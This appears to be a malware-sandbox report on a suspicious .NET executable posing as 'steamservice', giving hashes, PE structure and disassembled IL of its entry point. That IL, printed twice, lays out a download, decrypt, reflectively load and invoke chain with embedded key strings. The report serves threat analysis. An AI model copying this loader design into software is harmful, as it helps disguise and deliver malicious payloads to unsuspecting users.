Suspicious
Suspect

6f7d2ade454e54b5b9a7b2d500908b15

PE Executable
|
MD5: 6f7d2ade454e54b5b9a7b2d500908b15
|
Size: 1.69 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
Hash Value
MD5
6f7d2ade454e54b5b9a7b2d500908b15
Sha1
163336080d854d83203fb73edaf5aa9b8e4b9ac0
Sha256
765bd0d1ba46da4d04c560ecdac0c0a1b8ab1dc9fd3665de59bced81cdb43712
Sha384
23bf290e085b57f7800ce3f0a878b328c566c11d0662b3be2d6fa2513251c7b9e9bea5d26a49b307326f6777be965cd6
Sha512
4b699e53d27889e12be92671e43faa48546744bf46bd077deba6e113e2a6258bffb02da645e586e26c68cd75d75dbbd815a20b18538aeaec3d23b4417c7bbfe7
SSDeep
24576:IFQN1GfXo7+SjAbXgkzZSamkhAxPXQGEZMhQCU9BQh3MBrLQm1:ZN16o7+IAbwkz07pQGEmKBaigm1
TLSH
8875D0612A050EBCEBE0BA38EBDD536513A52E95017B58CF13D03F8A3537E53BE9A051

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Uqbifzx.Properties.Resources.resources
Oxnnrtr
ILRepack.List
Informations
Name
Value
Module Name

steamservice

Full Name

steamservice

EntryPoint

System.Void Uqbifzx.Mggiujfksvo::Main()

Scope Name

steamservice

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

steamservice

Assembly Version

9.86.62.31

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.5

Total Strings

48

Main Method

System.Void Uqbifzx.Mggiujfksvo::Main()

Main IL Instruction Count

60

Main IL

newobj System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::.ctor() stloc.0 <null> ldstr 7dG///Ceu/vaR6PIeDoslA== stloc.1 <null> ldstr SmsSo/T1q5o= stloc.2 <null> ldsfld System.Func`1<System.Byte[]> Uqbifzx.Mggiujfksvo/<>c::<>9__0_0 dup <null> brtrue.s IL_0031: newobj System.Void Uqbifzx.Gckulpngfz::.ctor(System.Func`1<System.Byte[]>) pop <null> ldsfld Uqbifzx.Mggiujfksvo/<>c Uqbifzx.Mggiujfksvo/<>c::<>9 ldftn System.Byte[] Uqbifzx.Mggiujfksvo/<>c::<Main>b__0_0() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Uqbifzx.Mggiujfksvo/<>c::<>9__0_0 newobj System.Void Uqbifzx.Gckulpngfz::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Uqbifzx.Nakzwghi::.ctor(System.String,System.String) stfld Uqbifzx.Nakzwghi Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::decryptor ldloc.0 <null> newobj System.Void Uqbifzx.Gcwupl::.ctor() stfld Uqbifzx.Gcwupl Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::loader ldloc.0 <null> ldstr YZjeXaIRCBUXI8CyI9.oqAtYlpneD8UXtsiJ4 ldstr HarKgEt01 newobj System.Void Uqbifzx.Jyuyarag::.ctor(System.String,System.String) stfld Uqbifzx.Jyuyarag Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::invoker dup <null> ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__1(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Gckulpngfz::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Uqbifzx.Nakzwghi Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::decryptor ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__2(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Nakzwghi::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Uqbifzx.Gcwupl Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::loader ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__3(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Gcwupl::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Uqbifzx.Jyuyarag Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::invoker ldsfld System.Action Uqbifzx.Mggiujfksvo/<>c::<>9__0_4 dup <null> brtrue.s IL_00C8: callvirt System.Void Uqbifzx.Jyuyarag::add_InvocationCompleted(System.Action) pop <null> ldsfld Uqbifzx.Mggiujfksvo/<>c Uqbifzx.Mggiujfksvo/<>c::<>9 ldftn System.Void Uqbifzx.Mggiujfksvo/<>c::<Main>b__0_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Uqbifzx.Mggiujfksvo/<>c::<>9__0_4 callvirt System.Void Uqbifzx.Jyuyarag::add_InvocationCompleted(System.Action) callvirt System.Void Uqbifzx.Gckulpngfz::Lsmxpm() ret <null>

Module Name

steamservice

Full Name

steamservice

EntryPoint

System.Void Uqbifzx.Mggiujfksvo::Main()

Scope Name

steamservice

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

steamservice

Assembly Version

9.86.62.31

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.5

Total Strings

48

Main Method

System.Void Uqbifzx.Mggiujfksvo::Main()

Main IL Instruction Count

60

Main IL

newobj System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::.ctor() stloc.0 <null> ldstr 7dG///Ceu/vaR6PIeDoslA== stloc.1 <null> ldstr SmsSo/T1q5o= stloc.2 <null> ldsfld System.Func`1<System.Byte[]> Uqbifzx.Mggiujfksvo/<>c::<>9__0_0 dup <null> brtrue.s IL_0031: newobj System.Void Uqbifzx.Gckulpngfz::.ctor(System.Func`1<System.Byte[]>) pop <null> ldsfld Uqbifzx.Mggiujfksvo/<>c Uqbifzx.Mggiujfksvo/<>c::<>9 ldftn System.Byte[] Uqbifzx.Mggiujfksvo/<>c::<Main>b__0_0() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Uqbifzx.Mggiujfksvo/<>c::<>9__0_0 newobj System.Void Uqbifzx.Gckulpngfz::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Uqbifzx.Nakzwghi::.ctor(System.String,System.String) stfld Uqbifzx.Nakzwghi Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::decryptor ldloc.0 <null> newobj System.Void Uqbifzx.Gcwupl::.ctor() stfld Uqbifzx.Gcwupl Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::loader ldloc.0 <null> ldstr YZjeXaIRCBUXI8CyI9.oqAtYlpneD8UXtsiJ4 ldstr HarKgEt01 newobj System.Void Uqbifzx.Jyuyarag::.ctor(System.String,System.String) stfld Uqbifzx.Jyuyarag Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::invoker dup <null> ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__1(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Gckulpngfz::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Uqbifzx.Nakzwghi Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::decryptor ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__2(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Nakzwghi::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Uqbifzx.Gcwupl Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::loader ldloc.0 <null> ldftn System.Void Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::<Main>b__3(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Uqbifzx.Gcwupl::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Uqbifzx.Jyuyarag Uqbifzx.Mggiujfksvo/<>c__DisplayClass0_0::invoker ldsfld System.Action Uqbifzx.Mggiujfksvo/<>c::<>9__0_4 dup <null> brtrue.s IL_00C8: callvirt System.Void Uqbifzx.Jyuyarag::add_InvocationCompleted(System.Action) pop <null> ldsfld Uqbifzx.Mggiujfksvo/<>c Uqbifzx.Mggiujfksvo/<>c::<>9 ldftn System.Void Uqbifzx.Mggiujfksvo/<>c::<Main>b__0_4() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Uqbifzx.Mggiujfksvo/<>c::<>9__0_4 callvirt System.Void Uqbifzx.Jyuyarag::add_InvocationCompleted(System.Action) callvirt System.Void Uqbifzx.Gckulpngfz::Lsmxpm() ret <null>

6f7d2ade454e54b5b9a7b2d500908b15 (1.69 MB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Uqbifzx.Properties.Resources.resources
Oxnnrtr
ILRepack.List
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙